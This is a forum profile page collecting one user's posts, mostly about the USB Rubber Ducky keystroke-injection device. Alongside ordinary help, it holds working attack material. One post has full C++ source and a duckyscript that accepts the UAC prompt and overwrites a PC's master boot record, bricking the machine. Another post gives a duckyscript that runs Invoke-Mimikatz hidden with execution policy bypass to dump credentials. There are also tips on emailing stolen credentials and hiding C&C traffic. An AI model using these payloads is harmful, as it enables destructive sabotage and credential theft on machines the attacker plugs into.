
ThoughtfulDev
Active Members
Posts: 66
Days Won: 1

Everything posted by ThoughtfulDev

  1. How about using Domain Fronting? You can connect your C&C server to a VPN with port forwarding and then let the shell connect to that port on the VPN side, which will then be forwarded to your C&C... in theory.
  2. be quiet! Silent Base 800 Black, No Window; ASUS Prime X370-Pro; AMD Ryzen 7 1700X; 2x8GB Vengeance DDR4-3200; be quiet! Silent Loop 120mm; MSI GTX 770; Samsung 850 Evo 250GB SSD; 550 Watt Corsair Semi Modular PSU (don't know the actual name rn). Wanted to buy a new GPU for machine learning but prices are so damn high...
  3. Did you change the keyboard layout to "es" when compiling the duckyscript?
  4. Reminds me of my PyDuckGen. But it seems like your script works ;) (I'll have a look if I can improve your script.)
  5. I guess that this is not possible since no driver is loaded and/or can be installed if you aren't on Win/Linux/OSX.
  6. This is wrong: no quotes and no = are needed. It should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
  7. That would be possible if he were using a Bash Bunny, haha :) Since the Ducky is only a HID, this won't work directly on the Ducky.
  8. As far as I know the Ducky can't do that on its own. Maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that, and the Ducky just presses CTRL+V to copy that random character?
  9. The Intel ones do work with e.g. Gallium OS (which is Ubuntu + the necessary Chromebook drivers). (I use it myself.)
  10. I don't get your problem? Session 1 was opened... so just use 'sessions' to list your sessions and interact with them. This is basic Metasploit stuff... maybe you should have a look at Metasploit Minute.
  11. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)
      I made a payload to overwrite your bootloader with the nyancat bootloader, which will render your PC USELESS.
      CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC. USE A VM.

      1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

          #include <windows.h>
          #include <conio.h>
          #include <iostream>

          int main(int argc, char* argv[]) {
              DWORD dw;
              const char *pathToBin = "boot.bin";
              // Raw handle to the first physical disk; opening it requires administrator privileges
              HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL,
                                        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
              if (drive != INVALID_HANDLE_VALUE) {
                  HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
                  if (binary != INVALID_HANDLE_VALUE) {
                      DWORD size = GetFileSize(binary, 0);
                      if (size > 0) {
                          byte *mbr = new byte[size];
                          if (ReadFile(binary, mbr, size, &dw, 0)) {
                              std::cout << "Binary file successfully read!" << std::endl;
                              if (WriteFile(drive, mbr, size, &dw, 0)) {
                                  std::cout << "First sector overwritten successfully!" << std::endl;
                              } else std::cerr << "Fatal error! Can't overwrite 1st sector!" << std::endl;
                          } else std::cerr << "Error reading from binary file!" << std::endl;
                          delete[] mbr;
                      } else std::cerr << "Invalid binary file!" << std::endl;
                      CloseHandle(binary);
                  } else {
                      std::cerr << "Can't find the binary file to read from!" << std::endl;
                  }
                  CloseHandle(drive);
              } else std::cerr << "Administrator privileges required!" << std::endl;
              return 0;
          }

      2. Create folder exec on your Ducky SD card and copy boot.exe into it.
      3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin and put it in DUCKY\exec\boot.bin
      4. Here is the duckyscript (make sure your SD card is labeled DUCKY):

          REM I am NOT responsible for ANY DAMAGE
          REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
          DELAY 5000
          ESCAPE
          DELAY 500
          CONTROL ESCAPE
          DELAY 500
          STRING cmd
          DELAY 500
          CTRL-SHIFT ENTER
          DELAY 1000
          REM replace with desired UAC alt + key combo (y for yes in English, j for German etc.)
          ALT y
          DELAY 1500
          STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
          ENTER
          DELAY 300
          STRING cd exec
          ENTER
          DELAY 300
          STRING boot.exe
          ENTER
          DELAY 1000
          STRING exit
          ENTER

      I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen), which makes generating payloads easier. (Attachment: boot.exe)
  12. Try encoding in your keyboard layout (default is US).
  13. You can run PowerShell and cmd without admin privs, or am I mistaken? E.g. Ctrl+R and then powershell/cmd.exe will run it without admin privs.
  14. I'm using PIA, but have a look at That One Privacy Site. That dude is just awesome!
  15. Are you sure that PHP is enabled in your Apache or IIS webserver? Try to place a PHP file, e.g. test.php, in the web directory root with the following content: <?php phpinfo(); ?> If you now visit yourwebserver/test.php you should see a table with some information if PHP is enabled.

      I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz:

          REM -------------------------------------------------------------------------------------
          REM Get drive letter of drive with label DUCKY
          REM -------------------------------------------------------------------------------------
          STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
          ENTER
          DELAY 500
          REM -------------------------------------------------------------------------------------
          REM Copy and execute Invoke Mimikatz
          REM -------------------------------------------------------------------------------------
          STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

      Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.
  16. The c_duck_v2.1.hex is the standard TwinDuck firmware, which mounts your Ducky as a HID keyboard and USB storage device. The payload starts as soon as you plug it in. This is probably what you want to use.
  17. Flash the TwinDuck firmware, which allows the Ducky to be seen as a USB storage device and a HID keyboard. Then call your SD card 'DUCKY' and use this script: for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d  -  %duck% stores the drive letter of your Ducky :)
  18. Use something like: Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt'; This writes the output of Invoke-Mimikatz to your temp folder in a file named yourpcname_creds.txt, which you can then read or even send as an email attachment if you want. PS: the Invoke-Mimikatz script isn't hosted on Darren's webserver - use your own host.
  19. As far as I know it should show any output since it only writes a file in the current folder (e.g. /var/www/html or something).
  20. It should work as long as there are corresponding hotkeys to do the things you want :)
  21. FAT32. And no, only the inject.bin, since this was just the hello world payload. As already said, use the Java encoder to encode your raw txt payload into the inject.bin.
  22. I use this one to find a drive labeled DUCKY (works in Win 10/8/7): for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d  -  %duck% contains your Ducky drive letter.
  23. Sounds like you need a basic Metasploit payload (don't worry about the stealth/undetected part for now). Have a look at Metasploit Minute for tutorials about Metasploit.